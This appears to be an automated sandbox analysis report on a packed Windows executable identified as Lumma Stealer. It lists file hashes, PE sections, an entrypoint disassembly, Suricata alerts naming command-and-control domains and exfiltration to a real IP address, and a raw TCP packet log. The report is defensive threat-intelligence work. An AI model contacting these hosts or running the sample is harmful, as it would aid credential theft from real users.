                                                                                                                                                                                                                                                                      File size:2'951'680 bytes
                                                                                                                                                                                                                                                                      MD5:fccb91d8f4ef18da22c21583c82c56c0
                                                                                                                                                                                                                                                                      SHA1:8c102cc60221c9fc5d83b84c86f70f735d3e8214
                                                                                                                                                                                                                                                                      SHA256:b98dde6aa8a1e509e9def76dbfc5da5518b52d0b23abbba5525fd7739b8e605b
                                                                                                                                                                                                                                                                      SHA512:703bf1106f7ad56a46d100aeaaf5fea60a80cbb9119abef872d0749fb30ff5c1aea4c0a05000fa5184c9a279822b6ffa82785cdb1c27fc6ca7515f5526ad43ac
                                                                                                                                                                                                                                                                      SSDEEP:49152:At2oFOooQkx0AfUF72iyzi+jcNjSFl/aAVKbEcx2oJuQ:6FOooQkx0AfUF72iAD45SFlCAVKl2op
                                                                                                                                                                                                                                                                      TLSH:E4D53AA2A50562CFD88E1774542BDD82695D07F98F2048C79C2DF4BEBDB3DC121BAE24
                                                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@...........................0.....dv-...@.................................Y@..m..

                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Entrypoint:0x6fd000
                                                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                      Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                      jmp 00007F3358716CAAh
                                                                                                                                                                                                                                                                      psubsb mm5, qword ptr [eax+eax]
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      jmp 00007F3358718CA5h
                                                                                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], dh
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax+00h], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add dword ptr [edx], ecx
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      pop es
                                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                      0x10000x520000x264007d462f32bd4ee1913de4c3c8af227ef0False0.9995532066993464data7.972809484614253IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      wxmqvxzx0x550000x2a70000x2a6e00ef5f1a5af1927091da284401a8e2dd15unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      igxirnni0x2fc0000x10000x400084d4955afa1b265c13a2971c9c86167False0.7431640625data5.8449707799936235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      .taggant0x2fd0000x30000x2200be16a3e400a23eac85880ccf0efde232False0.06502757352941177DOS executable (COM)0.7526901123271367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                      kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                      2024-12-28T09:40:36.603434+01002058582ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz)1192.168.2.6514301.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:36.754966+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.6547121.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:36.898768+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.6541941.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:37.042295+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.6527361.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:37.187079+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.6543881.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:37.334435+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.6650211.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:37.482669+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.6623731.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:37.628228+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.6593381.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:37.770258+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.6559551.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:39.542504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64970823.55.153.106443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:40.342216+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64970823.55.153.106443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:41.997663+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:42.754289+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649711172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:42.754289+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:44.043402+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:44.806133+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649712172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:44.806133+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:46.404954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:48.769334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:51.149799+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649734172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:53.751677+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649745172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:54.892469+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649745172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:56.618003+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649752172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:40:56.694770+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.649752172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-28T09:41:00.510681+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649764172.67.157.254443TCP

                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.065310001 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.065350056 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.065543890 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.092629910 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.092648983 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.542423010 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.542504072 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.546881914 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.546889067 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.547349930 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.588773012 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.667320967 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:39.715346098 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342323065 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342355967 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342398882 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342400074 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342415094 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342431068 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342442036 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342462063 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342485905 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.342504978 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.528911114 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.528976917 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.529103041 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.529124975 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.529175997 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559463978 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559511900 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559568882 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559576035 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.559622049 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575890064 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575911045 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575922966 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.575930119 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727094889 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727171898 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727251053 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727607012 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.727622986 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:41.997545004 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:41.997663021 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.010251045 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.010288954 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.011450052 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.012541056 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.012577057 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.012717009 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754362106 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754663944 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754734039 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754870892 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754894972 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754914045 CET49711443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.754921913 CET44349711172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.783554077 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.783622980 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.783705950 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.784193993 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:42.784209013 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.043248892 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.043401957 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.044941902 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.044951916 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.045191050 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.046459913 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.046459913 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.046539068 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806196928 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806351900 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806443930 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806464911 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806539059 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806588888 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.806596994 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.808948040 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.809000969 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.809007883 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.817385912 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.817464113 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.817485094 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.825834990 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.825908899 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.825923920 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.869735003 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.925493956 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.979116917 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:44.979152918 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.007117987 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.007271051 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.007308006 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010582924 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010657072 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010694027 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010870934 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.010934114 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014118910 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014157057 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014173031 CET49712443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.014182091 CET44349712172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.145944118 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146061897 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146173954 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146480083 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:45.146528959 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.404871941 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.404953957 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.406445980 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.406470060 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.406766891 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.407963991 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.408130884 CET49718443192.168.2.6172.67.157.254
